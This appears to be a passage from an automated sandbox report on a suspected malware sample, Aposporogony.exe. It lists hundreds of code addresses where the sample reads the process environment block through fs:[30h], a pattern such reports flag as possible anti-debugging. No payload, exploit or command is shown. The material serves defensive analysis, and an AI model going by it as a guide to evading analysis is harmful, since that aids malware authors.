      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D847C95 mov eax, dword ptr fs:[00000030h]4_2_1D847C95
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E9C98 mov ecx, dword ptr fs:[00000030h]4_2_1D8E9C98
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E9C98 mov eax, dword ptr fs:[00000030h]4_2_1D8E9C98
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E9C98 mov eax, dword ptr fs:[00000030h]4_2_1D8E9C98
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E9C98 mov eax, dword ptr fs:[00000030h]4_2_1D8E9C98
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FFC95 mov eax, dword ptr fs:[00000030h]4_2_1D8FFC95
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D836CC0 mov eax, dword ptr fs:[00000030h]4_2_1D836CC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D836CC0 mov eax, dword ptr fs:[00000030h]4_2_1D836CC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D836CC0 mov eax, dword ptr fs:[00000030h]4_2_1D836CC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914CD2 mov eax, dword ptr fs:[00000030h]4_2_1D914CD2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D876CC0 mov eax, dword ptr fs:[00000030h]4_2_1D876CC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D879CCF mov eax, dword ptr fs:[00000030h]4_2_1D879CCF
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D84FCC9 mov eax, dword ptr fs:[00000030h]4_2_1D84FCC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DCD1 mov eax, dword ptr fs:[00000030h]4_2_1D85DCD1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DCD1 mov eax, dword ptr fs:[00000030h]4_2_1D85DCD1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DCD1 mov eax, dword ptr fs:[00000030h]4_2_1D85DCD1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87CCD1 mov ecx, dword ptr fs:[00000030h]4_2_1D87CCD1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87CCD1 mov eax, dword ptr fs:[00000030h]4_2_1D87CCD1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87CCD1 mov eax, dword ptr fs:[00000030h]4_2_1D87CCD1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D868CDF mov eax, dword ptr fs:[00000030h]4_2_1D868CDF
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D868CDF mov eax, dword ptr fs:[00000030h]4_2_1D868CDF
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D3CD4 mov eax, dword ptr fs:[00000030h]4_2_1D8D3CD4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D3CD4 mov eax, dword ptr fs:[00000030h]4_2_1D8D3CD4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D3CD4 mov ecx, dword ptr fs:[00000030h]4_2_1D8D3CD4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D3CD4 mov eax, dword ptr fs:[00000030h]4_2_1D8D3CD4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D3CD4 mov eax, dword ptr fs:[00000030h]4_2_1D8D3CD4
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C5CD0 mov eax, dword ptr fs:[00000030h]4_2_1D8C5CD0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C0CEE mov eax, dword ptr fs:[00000030h]4_2_1D8C0CEE
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D7CE8 mov eax, dword ptr fs:[00000030h]4_2_1D8D7CE8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D837CF1 mov eax, dword ptr fs:[00000030h]4_2_1D837CF1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D843CF0 mov eax, dword ptr fs:[00000030h]4_2_1D843CF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D843CF0 mov eax, dword ptr fs:[00000030h]4_2_1D843CF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86ECF3 mov eax, dword ptr fs:[00000030h]4_2_1D86ECF3
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86ECF3 mov eax, dword ptr fs:[00000030h]4_2_1D86ECF3
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BCCF0 mov ecx, dword ptr fs:[00000030h]4_2_1D8BCCF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872C10 mov eax, dword ptr fs:[00000030h]4_2_1D872C10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872C10 mov eax, dword ptr fs:[00000030h]4_2_1D872C10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872C10 mov eax, dword ptr fs:[00000030h]4_2_1D872C10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872C10 mov eax, dword ptr fs:[00000030h]4_2_1D872C10
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D853C20 mov eax, dword ptr fs:[00000030h]4_2_1D853C20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85AC20 mov eax, dword ptr fs:[00000030h]4_2_1D85AC20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85AC20 mov eax, dword ptr fs:[00000030h]4_2_1D85AC20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85AC20 mov eax, dword ptr fs:[00000030h]4_2_1D85AC20
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D905C38 mov eax, dword ptr fs:[00000030h]4_2_1D905C38
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D905C38 mov ecx, dword ptr fs:[00000030h]4_2_1D905C38
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8D7C38 mov eax, dword ptr fs:[00000030h]4_2_1D8D7C38
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D874C3D mov eax, dword ptr fs:[00000030h]4_2_1D874C3D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D838C3D mov eax, dword ptr fs:[00000030h]4_2_1D838C3D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83DC40 mov eax, dword ptr fs:[00000030h]4_2_1D83DC40
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D853C40 mov eax, dword ptr fs:[00000030h]4_2_1D853C40
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914C59 mov eax, dword ptr fs:[00000030h]4_2_1D914C59
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C3C57 mov eax, dword ptr fs:[00000030h]4_2_1D8C3C57
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87BC6E mov eax, dword ptr fs:[00000030h]4_2_1D87BC6E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87BC6E mov eax, dword ptr fs:[00000030h]4_2_1D87BC6E
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83CC68 mov eax, dword ptr fs:[00000030h]4_2_1D83CC68
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D840C79 mov eax, dword ptr fs:[00000030h]4_2_1D840C79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D840C79 mov eax, dword ptr fs:[00000030h]4_2_1D840C79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D840C79 mov eax, dword ptr fs:[00000030h]4_2_1D840C79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D848C79 mov eax, dword ptr fs:[00000030h]4_2_1D848C79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D848C79 mov eax, dword ptr fs:[00000030h]4_2_1D848C79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D848C79 mov eax, dword ptr fs:[00000030h]4_2_1D848C79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D848C79 mov eax, dword ptr fs:[00000030h]4_2_1D848C79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D848C79 mov eax, dword ptr fs:[00000030h]4_2_1D848C79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C8F8B mov eax, dword ptr fs:[00000030h]4_2_1D8C8F8B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C8F8B mov eax, dword ptr fs:[00000030h]4_2_1D8C8F8B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C8F8B mov eax, dword ptr fs:[00000030h]4_2_1D8C8F8B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov ecx, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D850F90 mov eax, dword ptr fs:[00000030h]4_2_1D850F90
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86BF93 mov eax, dword ptr fs:[00000030h]4_2_1D86BF93
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D841FAA mov eax, dword ptr fs:[00000030h]4_2_1D841FAA
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D844FB6 mov eax, dword ptr fs:[00000030h]4_2_1D844FB6
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86CFB0 mov eax, dword ptr fs:[00000030h]4_2_1D86CFB0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86CFB0 mov eax, dword ptr fs:[00000030h]4_2_1D86CFB0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D878FBC mov eax, dword ptr fs:[00000030h]4_2_1D878FBC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83BFC0 mov eax, dword ptr fs:[00000030h]4_2_1D83BFC0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C1FC9 mov eax, dword ptr fs:[00000030h]4_2_1D8C1FC9
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D839FD0 mov eax, dword ptr fs:[00000030h]4_2_1D839FD0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFFDC mov eax, dword ptr fs:[00000030h]4_2_1D8BFFDC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFFDC mov eax, dword ptr fs:[00000030h]4_2_1D8BFFDC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFFDC mov eax, dword ptr fs:[00000030h]4_2_1D8BFFDC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFFDC mov ecx, dword ptr fs:[00000030h]4_2_1D8BFFDC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFFDC mov eax, dword ptr fs:[00000030h]4_2_1D8BFFDC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFFDC mov eax, dword ptr fs:[00000030h]4_2_1D8BFFDC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914FFF mov eax, dword ptr fs:[00000030h]4_2_1D914FFF
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D868FFB mov eax, dword ptr fs:[00000030h]4_2_1D868FFB
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85CF00 mov eax, dword ptr fs:[00000030h]4_2_1D85CF00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85CF00 mov eax, dword ptr fs:[00000030h]4_2_1D85CF00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFF03 mov eax, dword ptr fs:[00000030h]4_2_1D8BFF03
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFF03 mov eax, dword ptr fs:[00000030h]4_2_1D8BFF03
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFF03 mov eax, dword ptr fs:[00000030h]4_2_1D8BFF03
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87BF0C mov eax, dword ptr fs:[00000030h]4_2_1D87BF0C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87BF0C mov eax, dword ptr fs:[00000030h]4_2_1D87BF0C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87BF0C mov eax, dword ptr fs:[00000030h]4_2_1D87BF0C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914F1D mov eax, dword ptr fs:[00000030h]4_2_1D914F1D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D880F16 mov eax, dword ptr fs:[00000030h]4_2_1D880F16
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D880F16 mov eax, dword ptr fs:[00000030h]4_2_1D880F16
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D880F16 mov eax, dword ptr fs:[00000030h]4_2_1D880F16
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D880F16 mov eax, dword ptr fs:[00000030h]4_2_1D880F16
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C8F3C mov eax, dword ptr fs:[00000030h]4_2_1D8C8F3C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C8F3C mov eax, dword ptr fs:[00000030h]4_2_1D8C8F3C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C8F3C mov ecx, dword ptr fs:[00000030h]4_2_1D8C8F3C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C8F3C mov ecx, dword ptr fs:[00000030h]4_2_1D8C8F3C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DF36 mov eax, dword ptr fs:[00000030h]4_2_1D85DF36
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DF36 mov eax, dword ptr fs:[00000030h]4_2_1D85DF36
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DF36 mov eax, dword ptr fs:[00000030h]4_2_1D85DF36
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D85DF36 mov eax, dword ptr fs:[00000030h]4_2_1D85DF36
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83FF30 mov edi, dword ptr fs:[00000030h]4_2_1D83FF30
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FBF4D mov eax, dword ptr fs:[00000030h]4_2_1D8FBF4D
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FAF50 mov ecx, dword ptr fs:[00000030h]4_2_1D8FAF50
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8FEF66 mov eax, dword ptr fs:[00000030h]4_2_1D8FEF66
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914F7C mov eax, dword ptr fs:[00000030h]4_2_1D914F7C
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83BF70 mov eax, dword ptr fs:[00000030h]4_2_1D83BF70
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D841F70 mov eax, dword ptr fs:[00000030h]4_2_1D841F70
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AF72 mov eax, dword ptr fs:[00000030h]4_2_1D86AF72
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D896F70 mov eax, dword ptr fs:[00000030h]4_2_1D896F70
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83EF79 mov eax, dword ptr fs:[00000030h]4_2_1D83EF79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83EF79 mov eax, dword ptr fs:[00000030h]4_2_1D83EF79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83EF79 mov eax, dword ptr fs:[00000030h]4_2_1D83EF79
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86BE80 mov eax, dword ptr fs:[00000030h]4_2_1D86BE80
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AE89 mov eax, dword ptr fs:[00000030h]4_2_1D86AE89
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D86AE89 mov eax, dword ptr fs:[00000030h]4_2_1D86AE89
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87CEA0 mov eax, dword ptr fs:[00000030h]4_2_1D87CEA0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov eax, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov eax, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov eax, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov ecx, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D851EB2 mov eax, dword ptr fs:[00000030h]4_2_1D851EB2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D900EAD mov eax, dword ptr fs:[00000030h]4_2_1D900EAD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D900EAD mov eax, dword ptr fs:[00000030h]4_2_1D900EAD
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872EB8 mov eax, dword ptr fs:[00000030h]4_2_1D872EB8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D872EB8 mov eax, dword ptr fs:[00000030h]4_2_1D872EB8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D909ED2 mov eax, dword ptr fs:[00000030h]4_2_1D909ED2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C7EC3 mov eax, dword ptr fs:[00000030h]4_2_1D8C7EC3
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8C7EC3 mov ecx, dword ptr fs:[00000030h]4_2_1D8C7EC3
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914EC1 mov eax, dword ptr fs:[00000030h]4_2_1D914EC1
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D881ED8 mov eax, dword ptr fs:[00000030h]4_2_1D881ED8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87BED0 mov eax, dword ptr fs:[00000030h]4_2_1D87BED0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8CCED0 mov ecx, dword ptr fs:[00000030h]4_2_1D8CCED0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D843EE2 mov eax, dword ptr fs:[00000030h]4_2_1D843EE2
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D871EED mov eax, dword ptr fs:[00000030h]4_2_1D871EED
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D871EED mov eax, dword ptr fs:[00000030h]4_2_1D871EED
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D871EED mov eax, dword ptr fs:[00000030h]4_2_1D871EED
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D842EE8 mov eax, dword ptr fs:[00000030h]4_2_1D842EE8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D842EE8 mov eax, dword ptr fs:[00000030h]4_2_1D842EE8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D842EE8 mov eax, dword ptr fs:[00000030h]4_2_1D842EE8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D842EE8 mov eax, dword ptr fs:[00000030h]4_2_1D842EE8
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8E3EFC mov eax, dword ptr fs:[00000030h]4_2_1D8E3EFC
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83CEF0 mov eax, dword ptr fs:[00000030h]4_2_1D83CEF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83CEF0 mov eax, dword ptr fs:[00000030h]4_2_1D83CEF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83CEF0 mov eax, dword ptr fs:[00000030h]4_2_1D83CEF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83CEF0 mov eax, dword ptr fs:[00000030h]4_2_1D83CEF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83CEF0 mov eax, dword ptr fs:[00000030h]4_2_1D83CEF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83CEF0 mov eax, dword ptr fs:[00000030h]4_2_1D83CEF0
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D846E00 mov eax, dword ptr fs:[00000030h]4_2_1D846E00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D846E00 mov eax, dword ptr fs:[00000030h]4_2_1D846E00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D846E00 mov eax, dword ptr fs:[00000030h]4_2_1D846E00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D846E00 mov eax, dword ptr fs:[00000030h]4_2_1D846E00
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D843E01 mov eax, dword ptr fs:[00000030h]4_2_1D843E01
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D843E14 mov eax, dword ptr fs:[00000030h]4_2_1D843E14
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D843E14 mov eax, dword ptr fs:[00000030h]4_2_1D843E14
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D843E14 mov eax, dword ptr fs:[00000030h]4_2_1D843E14
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D878E15 mov eax, dword ptr fs:[00000030h]4_2_1D878E15
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D914E03 mov eax, dword ptr fs:[00000030h]4_2_1D914E03
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFE1F mov eax, dword ptr fs:[00000030h]4_2_1D8BFE1F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFE1F mov eax, dword ptr fs:[00000030h]4_2_1D8BFE1F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFE1F mov eax, dword ptr fs:[00000030h]4_2_1D8BFE1F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D8BFE1F mov eax, dword ptr fs:[00000030h]4_2_1D8BFE1F
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D83BE18 mov ecx, dword ptr fs:[00000030h]4_2_1D83BE18
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D842E32 mov eax, dword ptr fs:[00000030h]4_2_1D842E32
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D908E26 mov eax, dword ptr fs:[00000030h]4_2_1D908E26
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D908E26 mov eax, dword ptr fs:[00000030h]4_2_1D908E26
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D908E26 mov eax, dword ptr fs:[00000030h]4_2_1D908E26
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D908E26 mov eax, dword ptr fs:[00000030h]4_2_1D908E26
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 4_2_1D87CE3F mov eax, dword ptr fs:[00000030h]4_2_1D87CE3F
